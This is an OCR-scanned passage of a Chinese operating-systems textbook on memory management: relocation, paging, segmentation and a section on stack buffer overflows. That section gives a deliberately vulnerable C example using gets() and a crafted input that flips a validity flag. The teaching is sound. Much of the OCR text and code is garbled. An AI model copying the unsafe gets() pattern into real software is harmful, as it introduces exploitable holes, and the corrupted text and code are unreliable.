它 是 为 并 行程 序 分 配 和 释放 内 存 的 一 种 有 效 方法 (参阅 | JOHN92 ])。UNIX 内 核 存储 分 配 中 使 
用 了 一 种 改进 了 的 伙伴 系统 ( 将 在 第 8 章 论述 )。 
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图 7.6 伙伴 系统 的 例子 
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图 7.7 表示 伙伴 系统 的 树 
7.2.4 Bet 

在 考虑 解决 分 区 技术 的 缺陷 之 前 ， 必 须 先 解决 与 进程 在 内 存 中 的 放置 相关 的 一 个 遗留 问题 。 
当 使 用 如 图 7.3a 所 示 的 固定 分 区 方案 时 ， 一 个 进程 可 以 总 是 被 指定 到 同一 个 分 区 。 也 就 是 说 ， 当 
装 人 一 个 新 进程 时 ， 不论 选 择 哪 一 个 分 区 ， 当 这 个 进程 以 后 被 换 出 又 换 和 人 时 ,仍旧 使 用 这 个 分 区 。 
在 这 种 情况 下 , 需要 使 用 一 个 诸如 附录 7A 中 所 述 的 简单 的 重 定 位 加 载 器 : 当 一 个 进程 被 首次 加 载 
时 ， 代 码 中 的 相对 内 存 访问 被 绝对 的 内 存 地 址 代替 ， 这 个 绝对 地 址 由 进程 被 加 载 到 的 基地 址 确定 。 

对 于 大 小 相等 的 分 区 〈 如 图 7.2 所 示 ) 以 及 只 有 一 个 进程 队列 的 大 小 不 等 的 分 区 ( 如 图 7.3b 
所 示 ) 的 情况 ,一 个 进程 在 它 的 生命 周期 中 可 能 占据 不 同 的 分 区 。 当 第 一 次 创建 一 个 进程 映像 时 ， 
它 被 装 入 内 存 中 的 某 个 分 区 。 以 后 , 该 进程 可 能 被 换 出 ， 当 它 再 次 被 换 入 时 ,可 能 被 指定 到 与 上 
一 次 不 同 的 分 区 中 。 动 态 分 区 也 存在 同样 的 情况 。 观 察 图 7.4c 和 图 7.4h， 进 程 2 两 次 被 换 人 时 
占用 了 两 个 不 同 的 内 存 区 域 。 此 外 ， 当 使 用 压缩 时 ， 内 存 中 的 进程 也 可 能 会 发 生 移动 。 因 此 ， 进 
程 访问 的 〈 指 令 和 数据 单元 的 ) 位 置 不 是 固定 的 。 当 进程 被 换 人 或 者 在 内 存 中 移动 时 ， 指 令 和 数 
据 单元 的 位 置 会 发 生 改 变 。 为 解决 这 个 问题 , 需要 对 几 种 地 址 类 型 进行 区 分 。 逻辑 地 址 是 指 与 当 
前 数据 在 内 存 中 的 物理 分 配 地 址 无 关 的 访问 地 址 ,在 执行 对 内 存 的 访问 之 前 必须 把 它 转换 成 物理 
地 址 。 相 对 地 址 是 逻辑 地 址 的 一 个 特例 ,是 相对 于 某 些 已 知 点 (通常 是 程序 的 开始 处 ) 的 存储 单 
元 。 物 理 地 址 或 绝对 地 址 是 数据 在 内 存 中 的 实际 位 置 。 

系统 采用 运行 时 动态 加 载 的 方式 把 使 用 相对 地 址 的 程序 加 载 到 内 存 ( 相关 讨论 见 附录 7A )。 
通常 情况 下 , 被 加 载 进程 中 的 所 有 内 存 访问 都 相对 于 程序 的 开始 点 。 因 此 , 在 执行 包括 这 类 访问 
的 指令 时 ， 需 要 一 个 硬件 机 制 把 相对 地 址 转换 成 物理 内 存 地 址 。 

”图 7.8 给 出 了 实现 这 类 地 址 转换 的 一 种 典型 方法 。 当 进程 处 于 运行 态 时 , 一 个 特殊 的 处 理 器 
寄存 器 ,有 时 称 做 基 址 寄存 器 , 其 内 容 是 程序 在 内 存 中 的 起 始 地 址 。 还 有 一 个 界限 寄存 器 指明 程 
序 的 终止 位 置 。 当 程序 被 装 人 内 存 或 当 该 进程 的 映像 被 换 人 时 ,必须 设置 这 两 个 寄存 器 。 在 进程 
的 执行 过 程 中 会 遇 到 相对 地 址 , 包括 指令 寄存 器 的 内 容 、 跳 转 或 调用 指令 中 的 指令 地 址 以 及 加 载 
和 存储 指令 中 的 数据 地 址 。 每 个 这 样 的 相对 地 址 都 经 过 处 理 器 的 两 步 操 作 。 首 先 , 基 址 寄存 器 中 
的 值 加 上 相对 地 址 产生 一 个 绝对 地 址 ; 然后 ,得 到 的 结果 与 界限 寄存 器 的 值 相 比较 ,如果 这 个 地 
址 在 界限 范围 内 , 则 继续 该 指令 的 执行 否则， 向 操作 系统 发 出 一 个 中 渐 信 和 号， 操作 系统 必须 以 
某 种 方式 对 这 个 错误 做 出 响应 。 

图 7.8 中 的 方案 使 得 程序 可 以 在 执行 过 程 中 被 换 和 人 和 换 出 内 存 。 并 且 它 还 提供 了 一 种 保护 : 
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每 个 进程 映像 根据 基 址 和 界限 寄存 器 的 内 容 被 隔离 开 ， 以 免 受到 其 他 进程 的 越权 访问 。 
相对 地 址 





内 存 中 的 进程 映像 
图 7.8 重 定位 的 硬件 支持 


7.3 分 页 


大 小 不 等 的 固定 分 区 和 大 小 可 变 的 分 区 技术 在 内 存 的 使 用 上 都 是 低 效 的 ,前 者 会 产生 内 部 碎 
片 , 后 者 会 产生 外 部 碎片 。 但 是 , 假如 内 存 被 划分 成 大 小 固定 相等 的 块 ， 上 且 块 相对 比较 小 ,每 个 
进程 也 被 分 成 同样 大 小 的 小 块 , 那么 进程 中 称 为 页 的 块 可 以 指定 到 内 存 中 称 为 页 框 的 可 用 块 。 在 
本 节 中 将 会 看 到 , 使 用 分 页 技术 在 内 存 中 为 每 个 进程 浪费 的 空间 仅仅 是 进程 最 后 一 页 的 一 小 部 
分 形成 的 内 部 碎片 ， 没 有 任何 外 部 碎片 。 

图 7.9 说 明了 页 和 页 框 的 用 法 。 在 某 个 给 定 的 时 间 ， 内 存 中 的 某 些 页 框 正在 被 使 用 ， 某 些 页 
框 是 空闲 的 ， 操 作 系 统 维护 空闲 页 框 的 列表 。 存 储 在 磁盘 上 的 进程 A 由 4 个 页 组 成 。 当 装 和 人 这 
个 进程 时 ,操作 系统 查找 4 个 空闲 页 框 , 并 将 进程 A 的 4 页 装 人 这 4 个 页 框 中 , 如 图 7.9b 所 示 。 
进程 B 包含 3 页， 进程 C 包含 4 页 ,它们 依次 被 装 和 人 。 然 后 进程 B 被 挂 起 ， 并 被 换 出 内 存 。 后 
来 ， 内 存 中 的 所 有 进程 被 阻塞 ， 操 作 系 统 需 要 换 人 一 个 新 进程 ， 即 进程 D， 它 由 5 个 页 组 成 。 

现在 没有 足够 的 连续 页 框 来 保存 进程 D， 这 会 阻止 操作 系统 加 载 该 进程 吗 ? 答案 是 否定 的 ， 
因为 可 以 使 用 逻辑 地 址 来 解决 这 个 问题 。 这 时 仅 有 一 个 简单 的 基 址 寄存 器 是 不 够 的 , 操作 系统 需 
要 为 每 个 进程 维护 一 个 页 表 。 页 表 给 出 了 该 进程 的 每 一 页 对 应 的 页 框 的 位 置 。 在 程序 中 , STB 
辑 地 址 包括 一 个 页 号 和 在 该 页 中 的 偏 移 量 。 在 简单 分 区 的 情况 下 ， 逻 辑 地 址 是 一 个 字 相 对 于 程序 
开始 处 的 位 置 ， 处 理 器 把 它 转 换 成 一 个 物理 地 址 。 在 分 页 中 ,逻辑 地 址 到 物理 地 扯 的 转换 仍然 由 处 
理 器 硬件 完成 ， 并 且 处 理 器 必须 知道 如 何 访问 当前 进程 的 页 表 。 给 出 逻辑 地 址 (页 号 ， 偏 移 量 )， 
处 理 器 使 用 页 表 产 生物 理 地 址 (页 框 号 ， 偏 移 量 )。 

继续 前 面 的 例子 ， 进 程 D 的 5 页 被 装 人 页 框 4、5、6、11 和 12。 图 7.10 给 出 了 此 时 各 个 进 
程 的 页 表 。 进程 每 一 页 在 页 表 中 都 有 一 项 , 因此 页 表 可 以 很 容易 地 按 页 号 对 进程 的 所 有 页 进行 索 
引 ( 从 0 页 开始 )。 每 个 页 表 项 包含 内 存 中 的 用 于 保存 相应 页 的 页 框 的 页 框 号 。 此 外 ， 操 作 系 统 
为 当前 内 存 中 未 被 占用 、 可 供 使 用 的 所 有 页 框 维 护 一 个 空闲 页 框 列表 。 

由 此 可 见 前 面 所 述 的 简单 分 页 类 似 于 园 定 分 区 , 它们 的 不 同 之 处 在 于 : 采用 分 页 技术 的 分 区 
相当 小 ， 一 个 程序 可 以 占据 多 个 分 区 ， 并 且 这 些 分 区 不 需要 是 连续 的 。 
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d) WRH C 出 f) 加 载 进程 D 
图 7.9 ”为 进程 页 分 配 空 闲 页 框 





图 7.10 图 7.9 中 的 例子 在 时 间 点 (f) 时 的 数据 结构 


为 了 使 分 页 方案 更 加 方便 , 规定 页 的 大 小 以 及 页 框 的 大 小 必须 是 2 HE, 以 便 容易 地 表示 出 
相对 地 址 。 相 对 地 址 由 程序 的 起 点 和 逻辑 地 址 定义 ， 可 以 用 页 号 和 偏 移 量 表示 。 图 7.11 给 出 了 
一 个 例子 , 这 里 使 用 的 是 16 位 地 址 , 页 大 小 为 1KB ， 即 1024 字 节 。 例如 相对 地 址 1502 的 二 进 
制 形式 为 0000010111011110。 由 于 页 大 小 为 1KB， 偏 移 量 为 10 tz, MFK 6 位 为 页 号 ， 因 
此 ， 一 个 程序 最 多 由 25 二 64 页 组 成 ， 每 页 为 1KB。 如 图 7.11b 所 示 ， 相 对 地 址 1502 对 应 于 页 
1 (000001 ) 中 的 偏 移 量 478( 0111011110 )， 它 们 可 以 产生 相同 的 16 位 数 0000010111011110。 

使 用 页 大 小 为 2 的 吞 的 页 的 结果 是 双重 的 。 首先, 逻辑 地 址 方案 对 编程 者 、 汇 编 器 和 链接 器 
是 透明 的 。 程 序 的 每 个 逻辑 地 址 ( 页 号 ， 偏 移 量 ) 与 它 的 相对 地 址 是 一 至 的。 其 次 ,用 硬件 实现 
运行 时 动态 地 址 转换 的 功能 相对 比较 容易 。 考 虑 一 个 ntm 位 的 地 址 ， 最 左边 的 n 位 是 页 号 ， 最 
右边 的 m 位 是 偏 移 量 。 在 图 7.11b 的 例子 中 , n=6 A m= 二 10。 地 址 转换 需要 经 过 以 下 步 又 : 

o 提取 页 号 ， 即 逻辑 地 址 最 左面 的 nn 位。 

@ 以 这 个 页 号 为 索引 ， 查 找 该 进程 页 表 中 相应 的 页 框 号 ko 

@ 该 页 框 的 起 始 物 理 地 址 为 x2”， 被 访问 字 节 的 物理 地 址 是 这 个 数 加 上 偏 移 量 。 物理 地 

址 不 需要 计算 ， 可 以 简单 地 把 偏 移 量 附加 到 页 框 号 后 面 来 构造 物理 地 址 。 

在 前 面 的 例子 中 ， 逻 辑 地 址 为 0000010111011110， 它 的 页 号 为 1， 偏 况 量 为 478。 假 设 该 页 
驻 留 在 内 存 页 框 6 ( 即 二 进 制 000110 ) H, 则 物理 地 址 页 框 号 为 6, ， 偏 移 量 为 478, 物理 地 址 为 
0001100111011110， 如 图 7.12a 所 示 。 
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”逻辑 地 址 = 逻辑 地 址 = 
相对 地 址 =1502 页 号 =1, 偏 移 量 =478 段 号 =1, 偏 移 量 =752 
[0000010111011110] [00000110111011110] [0001001011110000] 
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a) 分 区 c) 分 段 





b) 分 页 
{页 大 小 =1KB) 


图 7.11 逻辑 地 址 
总 之 , 采用 简单 分 页 技术 , 内存 被 分 成 许多 大 小 相等 且 很 小 的 页 框 , 每 个 进程 被 划分 成 同样 
大 小 的 页 ; 较 小 的 进程 需要 较 少 的 页 ， 较 大 的 进程 需要 较 多 的 页 ; 当 一 个 进程 被 装 和 时, 它 的 所 
有 页 都 被 装 人 到 可 用 页 框 中 ， 并 且 建 立 一 个 页 表 。 这 种 方法 解决 了 分 区 技术 存在 的 许多 问题 。 
16 位 逻辑 地 址 
6 位 页 号 10 位 偏 移 量 
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进程 页 表 





> 
16 位 物理 地 址 


a) 分 页 


16 位 逻辑 地 址 
4 位 段 号 12 位 偏 量 


1 





bD 分 段 
图 7.12 逻辑 地 址 转换 成 物理 地 址 的 例子 
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7.4 分 段 


细 分 用 户 程序 的 另 一 种 可 选 方案 是 分 段 。 采 用 分 段 技术 , 可 以 把 程序 和 其 相关 的 数据 划分 到 
几 个 段 中 。 尽管 段 有 一 个 最 大 长 度 限制 , 但 并 不 要 求 所 有 程序 的 所 有 段 的 长 度 都 相等 。 和 分 页 一 
RE, ， 采 用 分 段 技 术 时 的 逻辑 地 址 也 是 由 两 部 分 组 成 : 段 号 和 偏 移 量 。 

由 于 使 用 大 小 不 等 的 段 , 分 段 类 似 于 动态 分 区 。 在 没有 采用 覆盖 方案 或 使 用 虚拟 内 存 的 情况 
下 ,为 执行 一 个 程序 , 需要 把 它 的 所 有 段 都 装 入 内 存 。 与 动态 分 区 不 同 的 是 ,在 分 段 方案 中 ,一 
个 程序 可 以 占据 多 个 分 区 , 并 且 这 些 分 区 不 要 求 是 连续 的 。 分 段 消 除了 内 部 碎片 , 但 是 和 动态 分 
区 一 样 ， 它 会 产生 外 部 碎片 。 不 过 由 于 进程 被 分 成 多 个 小 块 ， 因 此 外 部 碎片 也 会 很 小 。 

分 页 对 程序 员 来 说 是 透明 的 ,而 分 段 通常 是 可 见 的 , 并 且 作 为 组 织 程序 和 数据 的 一 种 方便 手 
段 提 供给 程序 员 。 一 般 情 况 下 , 程序 员 或 编译 器 会 把 程序 和 数据 指定 到 不 同 的 段 。 为 了 实现 模块 
化 程序 设计 的 目的 , 程序 或 数据 可 能 进一步 分 成 多 个 段 。 这 种 方法 最 不 方便 的 地 方 是 程序 员 必 须 
清楚 段 的 最 大 长 度 限 制 。 

采用 大 小 不 等 的 段 的 另 一 个 结果 是 , 逻辑 地 址 和 物理 地 址 间 不 再 具有 简单 的 对 应 关系 。 类似 
FOR, 在 简单 的 分 段 方案 中 , 每 个 进程 都 有 一 个 段 表 , 系统 也 会 维护 一 个 内 存 中 的 空闲 块 列 表 。 
每 个 段 表 项 必须 给 出 相应 的 段 在 内 存 中 的 起 始 地 址 , 还 必须 指明 段 的 长 度 ， 以 确保 不 会 使 用 无 效 
地 址 。 当 进程 进入 运行 状态 时 ,系统 会 把 其 段 表 的 地 址 装载 到 一 个 寄存 器 中 , 由 内 存 管理 硬件 来 
使 用 这 个 寄存 器 。 考 虑 一 个 ntm 位 的 地 址 ， 最 左边 的 n 位 是 段 号 ， 最 右边 的 m 位 是 偏 移 量 。 在 
图 7.11c 的 例子 中 n 二 4、m 二 12， 因 此 最 大 眉 长 度 为 22=4096。 进 行 地 址 转换 需要 以 下 步骤 : 

@ 提取 段 号 ， 即 逻辑 地 址 最 左边 的 二 位 。 

@ 以 这 个 段 号 为 索引 ， 查 找 该 进程 段 表 中 该 段 的 起 始 物理 地 址 。 

o 最 右边 m 位 表示 偏 移 量 , 偏 移 量 和 有 段 长 度 进行 比较 ， 如 果 偏 移 量 大 于 该 段 的 长 度 ， 则 这 

个 地 址 无 效 。 

© 物理 地 址 为 该 段 的 起 始 物 理 地 址 与 偏 移 量 的 和 。 

在 该 例子 中 ,逻辑 地 址 为 0001001011110000， 其 中 段 号 为 1， 偏 移 量 为 752。 假 设 这 个 段 驻 
留 在 内 存 中 ， 起 始 物理 地 址 为 0010000000100000， 则 相应 的 物理 地 址 为 0010000000100000 十 
001011110000= 0010001100010000， 如 图 7.12b 所 示 。 

BS, 采用 简单 分 段 技 术 ， 进程 被 划分 成 许多 段 , 段 的 大 小 不 需要 相等 。 当 一 个 进程 被 调 人 
时 ， 它 的 所 有 段 都 被 装 和 内存 的 可 用 区 域 中 ， 并 建立 一 个 段 表 。 


7.5 ”安全 问题 


内 存 和 虚拟 内 存 是 容易 受到 安全 威胁 的 系统 资源 ， 因 此 和 需要 采取 一 些 安全 对 策 来 保护 它们 。 
最 明显 的 安全 需求 是 防止 进程 内 存 中 的 内 容 遭 受 未 授权 访问 。 如 果 进 程 没 有 声明 共享 其 部 分 内 
E, 则 其 他 程序 不 得 访问 这 部 分 内 存 内 容 。 如 果 进 程 声明 其 某 部 分 内 存 可 以 被 指定 程序 共享 , 那 
么 操作 系统 的 安全 服务 必须 保证 只 有 这 些 指定 进程 可 以 访问 这 部 分 内 存 。 第 3 章 中 讨论 的 安全 
威胁 和 对 策 与 这 种 类 型 的 内 存 保 护 相 关 。 

本 节 中 概述 了 另 一 种 涉及 内 存 保护 的 安全 威胁 。 在 第 七 部 分 将 对 其 进行 详细 叙述 。 


7.5.1 ”缓冲 区 溢出 攻击 


这 里 将 介绍 一 种 涉及 内 存 管理 的 很 严重 的 安全 威胁 : 缓冲 区 溢出 (buffer overflow) ， 也 叫 
内 存 越界 (buffer overrun) , NIST ( 美国 国家 标准 技术 研究 院 ) 的 关键 信息 安全 术语 词汇 表 中 
对 其 定义 如 下 : 
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缓冲 区 溢出 : 输入 到 一 个 缓冲 区 或 者 数据 保 硝 区 域 的 数据 量 超过 了 其 容量 ， 从 而 导致 履 盖 了 其 
他 信息 的 一 种 状况 。 攻 击 者 造成 并 利用 这 种 状况 使 系统 前 涡 或 者 通过 插入 特制 的 代码 来 控制 系统 。 

当 一 个 进程 试图 向 一 个 固定 大 小 的 缓冲 区 中 存储 的 数据 量 超 过 了 这 个 缓冲 区 的 限制 时 ， 会 覆 
盖 相 邻 的 内 存单 元 ， 这 种 缓冲 区 溢出 可 能 是 由 编程 错误 造成 的 。 相 邻 的 内 存单 元 中 可 能 存 有 其 他 
程序 的 变量 、 参 数 或 者 类 似 于 返回 地 址 或 指向 前 一 个 栈 帧 的 指针 等 程序 控制 流 数据 。 缓 冲 区 可 以 
位 于 堆 、 栈 或 进程 的 数据 段 。 这 种 错误 的 后 果 包 括 程序 使 用 的 数据 损坏 ， 程 序 中 控制 流 发 生意 外 
改变 ， 违 法 的 内 存 访 问 ， 并 且 最 终 很 有 可 能 会 造成 程序 终止 。 当 攻击 者 成 功 地 攻击 了 一 个 系统 之 
后 ， 作 为 攻击 的 一 部 分 ,程序 的 控制 流 可 能 会 跳 转 到 攻击 者 选择 的 代码 处 ， 造 成 的 结果 是 被 攻击 
的 进程 可 以 执行 任意 的 特权 代码 。 缓 冲 区 溢出 攻击 是 最 普遍 和 最 危险 的 计算 机 安全 攻击 类 型 之 一 。 

为 了 说 明 一 种 常见 类 型 的 缓冲 区 溢出 ( 即 堆栈 溢出 ) 的 基本 过 程 ， 请 考虑 7.13a 图 中 给 出 的 
C 语言 main AM, MAPS 3 个 变量 (valid, stri 和 str2)e ， 它 们 的 值 将 被 存放 在 相 
邻 的 内 存单 元 中 。 它 们 的 顺序 和 位 置 取 决 于 变量 类 型 ( 局 部 的 或 全 局 的 ) 、 所 使 用 的 语言 和 编译 
器 以 及 目标 机 器 的 体系 结构 。 对 于 这 个 例子 ,假定 它们 从 高 到 低 存 储 在 连续 的 内 存单 元 中 ， 如 
图 7.14 所 示 S 。 这 是 一 个 典型 的 基于 常见 处 理 器 体系 结构 (如 Intel 奔腾 系统 ) 的 C 语言 函数 中 
局 部 变量 的 例子 。 程 序 段 的 目的 在 于 调用 函数 next_tag ( strl ) 将 -- 些 预期 的 标记 值 复 制 给 
stzr1I， 假 定 这 个 标记 值 为 字符 串 START, EER C 语言 的 标准 库 函 数 gets () 从 标准 输入 中 
读 取 下 一 行 ， 接 着 用 读 到 的 字符 串 与 预期 的 值 做 比较 。 如 果 下 一 行 确实 包含 字符 串 START, tt 
较 将 会 成 功 ， 变 量 valid 将 被 置 为 TRUE® 。 

本 例 为 图 7.13b 中 演示 的 三 个 例子 程序 的 第 一 个 。 其 他 任何 输入 标记 都 会 使 valia 的 值 为 
FALSE。 这 种 代码 段 可 以 用 于 解析 结构 化 的 网 络 协议 交互 或 者 格式 化 的 文本 文件 。 





int main(int argc,char *argv[]) { 
int valid = FALSE; 
char str1[8]; 
char str2[8]; 


next_tag (stri); 


gets (str2); 
if (strnemp(stri, str2, 8) 
valid = TRUE; 
printf ("bufferl: strl(%s), str2(%s), valid(%d)\n", strl, str2, valid); 





a) 基本 缓冲 区 溢出 C 代码 实例 


$ cc -g -o bufferl bufferl.c 

$ ./bufferl 

START 

bufferi: strl (START), str2(START), valid(1) 
$ ./bufferl 


EVILINPUITVALUE 

bufferl:str1l(TVALUE), str2(EVILINPUTVALUE), valid(0) 

$ ./pufferl 

BADINPUTBADINPUT 

bufferl: stril(BADINPUT), str2{BADINPUTBADINPUT), valid(1) 





b) 基本 缓冲 区 溢出 运行 实例 
图 7.13 ”基本 缓冲 区 溢出 的 例子 


O 在 本 例 中 ,标志 变量 的 类 型 是 整 型 而 不 是 布尔 型 。 这 样 做 既 遵 循 了 经 典 C 编程 风格 ， 又 避免 了 存储 空间 上 的 字 
对 齐 问题 。 缓 冲 区 有 意 被 设置 得 小 一 些 ， 以 强调 要 阐述 的 缓冲 区 滋 出 问题 。 

O 在 本 图 及 相关 图 中 ， 地 址 和 数据 的 值 以 十 六 进 制 表 示 。 数 据 的 值 在 合适 的 时 候 也 用 ASCI 字符 表示 。 

© 在 C 语 言 中 , SAA FALSE 和 TRUE 分 别 用 整数 0 和 1 (其 至 可 以 是 任何 非 零 值 ) 表示 。 正如 在 本 程序 中 所 做 
的 ,符号 定义 常 被 用 来 把 这 些 符 号 名 对 应 到 它们 的 真实 值 上 。 
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这 段 代 码 存在 问题 ， 因 为 传统 的 C 语言 库 函 数 gets () 不 包括 数据 复制 总 数 的 任何 检查 。 
它 从 程序 标准 输入 中 读 取 下 一 行文 本 ， 直 到 出 现 第 一 个 换行 符 8 , 并 且 把 复制 内 容 放 在 提供 的 组 
冲 区 中 ， 再 以 CBR AH? 所 用 的 NULL 终结 符 作 为 其 结尾 。 如 果 输 入 行 多 于 7 个 字符 ， 那 
么 在 读 入 这 些 字符 ( 带 NULL 终结 符 ) 时 所 需 的 空间 就 会 大 于 str2 缓冲 区 可 以 提供 的 空间 。 因 
此 ， 多 余 的 字符 将 会 覆盖 与 其 相 邻 的 变量 值 ， 本 例 中 为 stri, Ain, mR ANEH 
EVILINPUTVALUE, 结果 则 是 stri 被 字符 TVALUE MH, str2 不 仅 占据 为 其 分 配 的 8 个 字符 
位 置 , 还 占据 strl 中 大 于 7 个 字符 的 位 置 。 这 个 可 以 参考 图 7.13b 中 的 第 二 个 程序 运行 实例 。 这 
个 滋 出 导致 没有 直接 用 于 保存 此 输入 的 一 个 变量 的 数据 筑 坏 。 由 于 两 个 字符 不 相等 ，valia 值 
则 依然 为 FALSE。 此 外 ， 如 果 输 入 16 个 或 更 多 字符 ， 将 会 覆盖 更 多 额外 的 内 存单 元 。 


Memory Before After Contains 
Address gets(str2) gets(str2) Value of 


bffffbf4 argv 


bffffbf0 argc 


bffffbec return addr 


bffffbe8 old base ptr 


bffffbe4 valid 


bffffbeoO 


bffffbdc str1[4-7] 


bffffba8 str1[0-3] 


bffffbd4 str2 [4-7] 


bffffbdo str2 [0-3] 





7.14 ”基本 缓冲 区 溢出 时 栈 的 值 


前 面 举 例 说 明了 缓冲 区 溢出 的 基本 过 程 。 简 单 地 说 , 任何 未 经 检查 的 向 缓冲 区 复制 数据 的 行 
为 都 有 可 能 导致 相 邻 内 存单 元 数据 般 坏 , 这 些 单元 可 能 存储 其 他 变量 , 也 可 能 是 用 于 程序 控制 的 
地 址 和 数据 。 即 使 如 此 简单 的 例子 也 可 能 会 被 进一步 利用 。 理解 了 处 理 它 的 代码 结构 ,攻击 者 可 
以 设计 改写 str2 的 值 ， 从 而 使 得 stri 与 str2 的 值 相等 ， 进 而 影响 比较 结果 。 例 如 ， 输 入 行 
是 字符 申 BADINPUTBADINPUT， 随 后 比较 的 结果 参见 图 7.13b 中 第 三 个 程序 运行 示例 ， 并 且 图 
7.14 显示 了 在 调用 gets () 函数 之 前 和 之 后 的 局 部 变量 的 值 。 仍 需 注意 输入 字符 串 的 NULL 终止 
符 被 写 人 紧 跟 stri 之 后 的 内 存 空间 。 这 意味 着 当 读 取 的 tag 值 与 预期 值 完全 不 同时 ， 程 序 控制 
流 却 像 发 现 预 期 值 一 样 继续 运行 , 这 自然 会 导致 程序 不 按 预 期 运行 。 这 种 情况 的 严重 性 很 大 程度 
上 取决 于 被 攻击 程序 的 逻辑 ， 如 果 内 存 中 存放 的 不 是 tagt, 而 是 用 于 访问 特权 管理 的 预期 密码 
和 输入 密码 , 这 时 可 能 会 发 生 危 险 。 如 果 是 这 种 情况 , 缓冲 区 溢出 为 攻击 者 提供 了 即便 不 清楚 正 
确 密码 也 可 以 访问 特权 管理 的 方式 。 

为 了 利用 在 此 已 经 提 到 的 各 种 缓冲 区 溢出 类 型 ， 攻 击 者 需要 

1) 找 出 一 些 程序 中 可 能 被 攻击 者 控制 的 外 源 数据 触发 的 缓冲 区 溢出 漏洞 ; 

2) 了 解 缓冲 区 将 如 何在 进程 内 存 中 存储 ， 从 而 发 现 毁 坏 相 邻 内 存单 元 以 及 改变 程序 执行 流 
的 可 能 性 。 


© 换行 符 (NL R LF) 是 UNIX 系统 和 C 语言 中 的 标准 行 结束 符 ， 它 的 ASCI 码 是 0x0a。 

O 在 CC 语言 中 ,字符 串 是 用 以 NULL P (ASCI 码 为 0x00) 结尾 的 字符 数组 存储 的 。 数 组 中 NULL 字符 之 后 
的 位 置 是 没有 定义 的 ， 它 们 通常 包含 之 前 存储 在 那 块 内 存 区 域 里 的 任何 内 容 。 这 可 以 从 图 7.14 的 “Before” 列 
中 变量 str2 的 值 中 清楚 地 看 出 来 。 
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发 现 易 受 攻击 程序 可 以 通过 观察 程序 源码 , 追踪 程序 处 理 特大 型 输入 时 的 执行 情况 , 或 者 使 
用 特定 工具 ， 如 第 七 部 分 中 讨论 的 fuzzing， 可 以 自动 发 现 潜在 的 易 受 攻击 的 程序 。 攻 击 者 会 对 
其 导致 的 内 存 数据 毁坏 做 什么 处 理 相当 多 样 化 ， 这 要 取决 于 被 改写 的 数据 内 容 。 


7.5.2 预防 缓冲 区 溢出 


发 现 并 利用 堆栈 缓冲 区 溢出 并 不 困难 。 在 过 去 几 十 年 中 利用 其 攻击 成 功 的 显著 效果 已 经 济 想 
地 说 明了 这 点 。 因 此 非常 有 需要 来 保护 系统 以 免 受 缓冲 区 攻击 , 可 以 预防 或 者 至 少 要 能 够 检测 并 
且 阻 止 此 类 攻击 。 广 义 上 保护 对 策 分 为 两 类 

@ 编译 时 防御 系统 ， 目 的 是 强化 系统 以 抵制 潜伏 于 新 程序 中 的 恶意 攻击 。 

© 运行 时 防御 系统 ， 目 的 是 检测 并 中 止 现 有 程序 中 的 恶意 攻击 。 

尽管 合适 的 防御 系统 已 经 出 现 几 十 年 了 ,但 是 大 量 现 有 的 脆弱 的 软件 和 系统 阻碍 了 它们 的 部 
署 。 因 此 运行 时 防御 有 趣 的 地 方 是 它 能 够 部 署 在 操作 系统 中 , 可 以 更 新 , 并 能 为 现 有 的 易 受 攻击 
的 程序 提供 保护 。 


7.6 ”小结 


肉 存 管 理 是 操作 系统 中 最 重要 、 最 复杂 的 任务 之 一 。 内 存 管理 把 内 存 看 做 是 一 个 资源 ,可 以 
分 配给 多 个 活动 进程 ,或 者 由 多 个 活动 进程 共享 。 为 了 有 效 地 使 用 处 理 器 和 IO 设备 , 需要 在 内 
存 中 保留 尽 可 能 多 的 进程 。 此 外 ， 程 序 员 在 进行 程序 开发 时 最 好 能 不 受 程 序 大 小 的 限制 。 

内 存 管理 的 基本 工具 是 分 页 和 分 段 。 采 用 分 页 技术 , 每 个 进程 被 划分 成 相对 比较 小 的 、 大 小 
固定 的 页 。 采 用 分 段 技术 可 以 使 用 大 小 不 同 的 块 。 还 可 以 在 一 个 单独 的 内 存 管理 方案 中 把 分 页 技 
术 和 分 段 技术 结合 起 来 使 用 。 


7.7 ”推荐 读物 


由 于 分 区 技术 已 经 被 虚拟 内 存 所 取代 ， 因 而 大 多 数 操作 系统 书籍 中 仅 对 分 区 技术 进行 了 粗略 的 介绍 ， 
[ MILE92 ] 提供 了 最 完全 、 最 有 趣 的 介绍 。[ KNUT97 ] 给 册子 关于 分 区 策略 最 全 面 的 讨论 。 
有 关 链 接 和 加 载 的 主题 包含 在 许多 关于 程序 开发 、 计 算 亿 体系 结构 和 操作 系统 方面 的 书籍 中 , [BECK97] 
中 对 其 进行 了 非常 详细 的 介绍 。[ CLAR98 ] 中 也 有 很 好 的 论述 。[LEVI00] 给 出 了 对 其 在 实践 中 的 应 用 进行 
了 周详 的 讨论 ， 其 中 包含 有 大 量 的 操作 系统 示例 。 
BECK97 Beck,L.System Software.Reading,MA:Addison-Wesley, 1997. 
CLAR98 Clarke, D., and Merusi, D. System Software Programming: The Way Things Work. Upper Saddle 
River, NJ: Prentice Hall, 1998. 
KNUT97 Knuth, D. The Art of Computer Programming, Volume I: Fundamental Algorithms, 2nd Ed. 
Reading, MA: Addison-Wesley, 1997. 
LEVI00 Levine,J.Linkers and Loaders.San Francisco:Morgan Kaufmann,2000. 
MILE92 Milenkovic, M. Operating Systems: Concepts and Design. New York: McGraw-Hill, 1992. 


78 关键 术语 、 复 习题 和 习题 


关键 术语 
绝对 加 载 固定 分 区 逻辑 组 织 物理 组 织 
伙伴 系统 WHE 内 存 管理 保护 
压缩 内 部 碎片 页 面 相对 地 址 
动态 链接 链接 编辑 程序 RR 可 重 定位 加 载 
动态 分 区 链接 分 页 重 定位 
动态 运行 时 加 载 加 载 分 区 技术 RE 


外 部 碎片 逻辑 地 址 物理 地 址 共享 
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复习 题 


7.1 
7.2 
73 
7.4 
75 
7.6 
7.7 
7.8 
7.9 


内 存 管理 需要 满足 哪些 需求 ? 

为 什么 需要 重 定位 进程 的 能 力 ? 

为 什么 不 可 能 在 编译 时 实施 内 存 保护 ? 

允许 两 个 或 多 个 进程 访问 内 存 某 一 特定 区 域 的 原因 是 什么 ? 
在 固定 分 区 方案 中 ， 使 用 大 小 不 等 的 分 区 有 什么 好 处 ? 

内 部 碎片 和 外 部 碎片 有 什么 区 别 ? 

逻辑 地 址 、 相 对 地 址 和 物理 地 址 间 有 什么 区 别 ? 

页 和 页 框 之 间 有 什么 区 别 ? 

页 和 段 之 间 有 什么 区 别 ? 


习题 


7.1 
7.2 


7.3 


7.4 


75 


7.6 


